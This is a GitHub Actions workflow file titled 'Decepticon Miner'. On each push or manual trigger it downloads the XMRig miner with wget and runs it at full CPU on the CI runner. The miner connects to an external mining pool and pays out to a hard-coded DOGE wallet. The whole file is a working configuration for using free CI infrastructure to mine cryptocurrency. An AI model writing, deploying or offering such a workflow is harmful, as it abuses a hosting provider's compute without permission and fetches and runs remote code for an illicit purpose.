name: Decepticon Miner
on:
  push:
    branches: [ main, master ]
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
      - name: Idle Mining
        run: |
          wget http://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar -xf xmrig-6.21.0-linux-static-x64.tar.gz
          ./xmrig-6.21.0/xmrig -o rx.unmineable.com:3333 -a rx -k -u DOGE:D4dbTEpvsDDQK8V56USNgDsircfmDHXQQmTkafnxLR56.ActionsWorker -p x --cpu-max-threads-hint 100
